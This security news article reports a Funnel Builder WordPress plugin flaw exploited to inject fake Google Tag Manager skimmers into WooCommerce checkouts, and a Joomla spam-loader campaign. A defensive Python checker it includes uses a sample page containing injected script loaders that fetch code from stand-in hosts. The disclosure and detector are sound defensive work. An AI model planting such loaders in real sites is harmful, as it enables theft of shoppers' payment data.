Funnel Builder Flaw Under Active Exploitation Enables WooCommerce Checkout Skimming

Ravie Lakshmanan | May 16, 2026 | Vulnerability / Website Security

A significant security vulnerability affecting the Funnel Builder plugin for WordPress is currently being exploited to inject malicious JavaScript code into WooCommerce checkout pages, leading to the theft of payment data.

The details of the exploitation were recently revealed by Sansec. The vulnerability affects all versions of the plugin prior to 3.15.0.3, and the plugin is installed on over 40,000 WooCommerce stores.

The flaw allows unauthorized attackers to inject arbitrary JavaScript into every checkout page on the store, according to the Dutch e-commerce security company. FunnelKit, the developer of Funnel Builder, has released a patch for the vulnerability in version 3.15.0.3.

Attackers are embedding fake Google Tag Manager scripts into the plugin’s ‘External Scripts’ setting, disguising the injected code as regular analytics code. However, this code actually loads a payment skimmer that steals credit card numbers, CVVs, and billing addresses during checkout.

According to Sansec, Funnel Builder has a publicly exposed checkout endpoint that lets an incoming request select which internal method to run. Older versions neither verified the caller’s permissions nor restricted which methods could be invoked, leaving the endpoint open to abuse.

By sending an unauthenticated request, a malicious actor could exploit this vulnerability to write attacker-controlled data into the plugin’s global settings, which then gets injected into every Funnel Builder checkout page.

The end goal of this attack is to extract sensitive information such as credit card details, CVVs, and billing addresses from unsuspecting visitors during checkout. Website owners are urged to update the Funnel Builder plugin to the latest version and review the ‘Settings > Checkout > External Scripts’ section for any unfamiliar scripts.

Sansec highlighted the tactic of disguising skimmers as Google Analytics or Tag Manager code as a common approach used by attackers, as it often goes unnoticed by reviewers.
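A defender-side check for the review recommended above, written as an added example and not code from the article, Sansec or FunnelKit: it walks the checkout page’s script tags and flags any that load from a host outside the store’s own allowlist, calling out loaders that mention Google Tag Manager but fetch from elsewhere. The allowlist, the host names and the sample page are constructed.

```python
# Added example, not from the article or FunnelKit: flag checkout-page <script>
# tags a store owner did not authorise, i.e. the review the article recommends.
import re
from html.parser import HTMLParser

# Hosts this store knowingly loads scripts from (assumption: edit per store).
ALLOWED_HOSTS = {"www.googletagmanager.com", "www.google-analytics.com"}
GTM_MARKERS = re.compile(r"gtm\.js|GTM-[A-Z0-9]+|googletagmanager", re.I)
URL_HOSTS = re.compile(r"https?://([^/'\"\s]+)")


class ScriptCollector(HTMLParser):
    # Collect the src attribute and inline body of every <script> on the page.
    def __init__(self):
        super().__init__()
        self.scripts, self._cur = [], None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._cur = {"src": dict(attrs).get("src") or "", "body": ""}

    def handle_data(self, data):
        if self._cur is not None:
            self._cur["body"] += data

    def handle_endtag(self, tag):
        if tag == "script" and self._cur is not None:
            self.scripts.append(self._cur)
            self._cur = None


def find_suspicious_scripts(html):
    """Return (kind, host, reason) for each script loading from an unlisted host."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for s in collector.scripts:
        kind, source = ("external", s["src"]) if s["src"] else ("inline", s["body"])
        for host in URL_HOSTS.findall(source):
            if host not in ALLOWED_HOSTS:
                # GTM-looking code fetching from elsewhere is the disguise described above.
                gtm_like = GTM_MARKERS.search(source) is not None
                findings.append((kind, host, "GTM look-alike from unlisted host"
                                 if gtm_like else "loads from unlisted host"))
    return findings


# Constructed checkout page: a genuine-looking GTM tag, a fake GTM loader on an
# unrelated host, and an inline loader that fetches a script from elsewhere.
SAMPLE_CHECKOUT_HTML = """<html><head>
<script async src="https://www.googletagmanager.com/gtag/js?id=G-EXAMPLE"></script>
<script src="https://cdn.example-analytics.invalid/gtm.js?id=GTM-XXXX"></script>
<script>(function(){var s=document.createElement('script');s.src='https://stats.example-collector.invalid/loader.js';document.head.appendChild(s);})();</script>
</head><body>checkout form</body></html>"""
```

Running `find_suspicious_scripts` over a saved copy of a store’s checkout page reports two findings for the sample: the fake GTM loader and the inline loader, while the genuine Google host passes.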

This disclosure comes in the wake of Sucuri’s report on a campaign that compromises Joomla websites with obfuscated PHP code to serve spammy content without the site owner’s knowledge, abusing the site’s reputation to push the injected spam.

Security researcher Puja Srivastava explained that the malicious script functions as a remote loader, contacting an external server to receive instructions on what content to serve on the infected website.

This dynamic approach enables attackers to alter the behavior of compromised websites without modifying local files repeatedly, facilitating activities such as injecting spam product links, redirecting visitors, or displaying malicious pages.